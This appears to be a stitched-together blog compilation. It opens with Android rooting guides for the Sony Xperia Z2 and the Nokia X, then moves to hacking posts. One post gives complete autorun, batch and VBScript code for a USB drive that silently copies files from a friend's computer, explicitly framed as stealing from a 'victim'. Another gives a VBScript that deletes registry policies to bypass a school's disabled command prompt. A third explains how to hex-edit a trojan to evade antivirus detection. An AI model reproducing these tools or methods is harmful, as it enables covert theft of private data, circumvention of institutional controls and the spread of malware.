Aside from the bootloader unlock wiping your device and invalidating your warranty, you should note that while rooting may affect your ability to receive future OTAs, reverting back to stock is easy enough. We’ll cross that bridge when we come to it. :/

Download

APPLY THIS AT YOUR OWN RISK!

  • Superboot r2 – DOWNLOAD (ROMraid) – MD5: a4ca11f526f57f643a0a552ec234ad6f

How to use Superboot – Windows, Linux and OSX

  • SPAM Superboot zip file above and extract to a directory
  • Put your device in bootloader mode – Turn off the phone then turn on with the ‘volume down’ button pressed to enter the bootloader.
  • WINDOWS – run ‘superboot-windows.bat‘ as Administrator
  • MAC – Open a terminal window to the directory containing the files, and type ‘chmod +x superboot-mac.sh‘ followed by ‘sudo ./superboot-mac.sh
  • LINUX – Open a terminal window to the directory containing the files, and type ‘chmod +x superboot-linux.sh‘ followed by ‘sudo ./superboot-linux.sh

Enjoy Rooted!!!! 😀 😛

HOW TO ROOT SONY XPERIA Z2 ON ANDROID 4.4.2  

sony-xperia-z2

 Today we will learn  How to Root Sony Xperia Z2 on Android 4.4.2. It is the latest flagship of Android Smartphone from Sony which was officially announced in February and was one of the most awaited smartphone since, finally was released in March 2014. The expectations were too high and Sony maintained its promise by offering  awesome specifications in terms of hardware along with Android OS 4.4.2 KitKat. At present Xperia Z2 is a pure competitor of other Smartphone giants. Well  let us talk about our main topic for now, that is, how to gain root access on Xepria Z2. As we all believe that Developers are a way ahead from the stock Os manufacturers in rotting a phone, building custom roms, tweaking…etc. Similarly this time the xda member, DooMLoRD made it possible to root Xperia Z2 with Unlocked Bootloader, “Thanks Sir!”. To successfully gain root access we need to  learn how to flash ClockworkMod Recovery and then we will root Sony Xperia z2. Note that this rooting tutorial is 100% safe and working tested by many just follow the easy and simple step-by-step guide to make it posible….Nuffsaid…!

Requirements:

  • A windows based PC.
  • Sony Xperia Z2 running Android 4.4.2 KitKat (17.1.A.2.36 – v01)
  • An unlocked Bootloader,  (If not follow the Official Guide Here).
  • Make a backup of your important Data because Unlocking Bootloader wipes Data.
  • Make sure to Enable ‘USB Debugging’ from phone Settings>Developers Options.
  • At least charge your phone up to 60%.
  • Download & install the Fastboot drivers From HERE.
  • Also download the Advance Stock Kernel with Recovery From HERE.
  • Keep the Downloaded files on Desktop of your PC.

How to Flash Clock work Mod Recovery on Sony Xperia Z2 On Android 4.4.2

In this guide we will first flash the required ClockWorkMod Recovery using the fastboot commands on a Windows based Pc(Make sure to have Admin account) and once we are on a custom recovery we just need to flash the root package from the phone easily.

Step 1: Download the above mentioned required files to your PC and keep them in a safe and easy to access folder on your PC.

Step 2: Extract/Unrar the android.rar file on your desktop (It contains the fastboot drivers).

Step 3: The Advance Stock Kernel will be named as the “Z2_DooMLoRD_AdvStkKernel_FW-4.4.2_17.1.A.2.36.img”, Simply rename this file to recovery.img and move it to the android folder that you just extracted in step 2 as below,

root-xperia-z2-fastboot drivers

Step 4: Now connect your Sony Xperia Z2 to PC via the USB data cable and wait for the drivers to load and let your Pc recognise the Device.

Step 5: Open the Android folder containing (adb fastboot driver), Hold the Shift Key+Right Click, in the folder and select the “Open command window here” as below,

Untitledaxs

Step 6: You will be prompted with a “Command Window(like below)” just copy/paste or type the below mentioned commands(in step 7 & 8) one-by-one hitting enter after each one.

cmd

Step 7: Below is the command to flash Advance Stock kernel/Recover on Xperia Z2 just type it in Command window and hit enter.

fastboot flash boot recovery.img

Step 8: Wait for a few seconds and the Command window will Flash Custom Recovery on your device, on the completion of Successful flashing  type the below given command to Reboot the device and move on to the next guide for flashing the root package.

fastboot reboot

Congratzz you just flashed a Custom recovery on your Xperia Z2, now move on to the below guide to flash the rooting package using the installed CWM (clockworkmod). 

 

How to flash SuperSU & Root Sony Xperia Z2

Step 1: Download the Rooting Package of SuperSU from HERE.

Step 2: Now transfer the SuperSU zip package to your phone’s SD Card.

Step 3: Next, we need to enter the CWM Recovery on the device. Here is how to enter it:

  • Turn  off your phone.
  • Now turn on your phone and when you see the ‘Sony logo’ and the LED light turns pink keep pressing ‘Volume Up/+’ key until the recovery menu comes up.

Step 3: Once you are into the Recovery Mode/ClockWorkMod, Simply select the ‘Install zip from sd card’ option, proceedingly browse and select SuperSU zip file from the location where you’ve placed it in your SD card in ‘Step 2′.

Step 4: Confirm to flash with the help of volume up/down keys and power button to select.

Step 5: The SuperSU package will be flashed in a second or two, when successfully flushed move on to Reboot option in the Recovery using Volume keys and hit power button to confirm Reboot.

Congratzz…you just Rooted your  Sony Xperia Z2 with the most quickest and safest way.

To confirm the Root Access Simply install Root Checker App from Playstore & and run it to verify root access. Head on to try flashing Custom Roms, installing Apps that require Root access, And get the most out of your Android Smartphone.

 

How to root Nokia X and Install Google Play Store!

The Nokia X was recently introduced and is attracting a lot of attention, as it’s Nokia’s first Android-based phone. It runs a special Nokia X software platform based on Android 4.1.2 Jelly Bean, with Google services stripped out. Nokia has pledged Android support via the Nokia App Store, but now we have a video to share that shows how to root the Nokia X and install the Google Play Store.

This will allow Nokia X owners to access Google apps and services on the phone, which is something that many users would no doubt enjoy. The 10-minute YouTube video that we’ve embedded for you to view below this story comes from phone Arena, and gives a detailed demonstration of exactly how to do this.

Before we go any further we’ll point out that this involves rooting your Nokia X. At Phones Review we cannot recommend this, as it will void your warranty, so if you choose to do so then you do it at your own risk. Nevertheless, we know that many Android device owners enjoy this kind of activity, and so if you are confident that you know what you are doing you can make an informed decision.

The video very clearly explains how to root the Nokia X and access Google services in a 5-step process, so if you’d like to try it out this gives good instructions. Even if you don’t want to do this on your own Nokia X, it’s interesting to see exactly how it’s done. If you do try this yourself, be sure to let us know what you think of the results by sending us a comment.

Nokia X root and Google Play Store installation

Steel Someone Secret File Using USB Flash Drive.

 

 
Hi Friends,

Today i am posting a way to steel secret file from your friends computer.

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2

Open Notepad again and copy-paste the following lines
(code-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls)

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
STEP 3

Open Notepad once again and copy-paste the following line.
(code:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False)

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4

Open Notepad one last time and copy-paste the following line.
(code
wscript.exe \invisible.vbs file.bat)

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

 
 

 Soumik

Restore CMD at College

 

 
I am not responsible for what you do with this, what you do are your actions, not mine!

So your school disabled command prompt?

Well read this short and sweet tut and find out how to get it back!

First open notepad and paste this in:
Code:

Set WshShell = WScript.CreateObject(“WScript.Shell”)
With WScript.CreateObject(“WScript.Shell”)

On Error Resume Next

.RegDelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”
.RegDelete “HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD”

End With

Mybox = MsgBox(jobfunc & enab & vbCR & “Congrats, you have re-enabled your Command Prompt!”, 4096, t)

And click save as, 
Code:
cmdrestore.vbs
and click Save As: All Files, and just save it to the desktop or anywhere you want.

Then, go to where you save it and double click, if it says: “Congrats, you have re-enabled your Command Prompt” then it worked succesfully.

What it basically does is delete the DisableCMDPrompt registry, which then enables you to use command prompt…so enjoy!

Soumik

 
 

 

[Tut] Make virus undetectable by HEXeditor[Tut]

 

 
Many people asking how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
Content:
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
-step 3
__ __
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server heuristics, sandboxing, etc., and one of them is using so called “definition files”
that carry information about strings inside your server. Well, that’s the way we are
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific stings on specific parts
in your server, and if strings match with strings in the AV database, your file is
detected.
Let as say that detected strings are “XX” so we need to change that string to something
else (e.g. “XY”,”YY”) that isn’t in the AV definition database so the file can not be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server – not only one, depending on
what trojan you are using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts – this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
Thats why you need to check your server if its still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding parts to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset AV .
2. What tools we need.
– Unpacked trojan server. (That’s your virus)

– Hex editor > DOWNLOAD
– File Splitter > DOWNLOAD 

– AV-antivirus

3. How to hex:

Now to make more simple i add these video TuT how can u make virus undetectable by AV , Watch it > 

watch it here

 
 :::Soumik Ghosh:::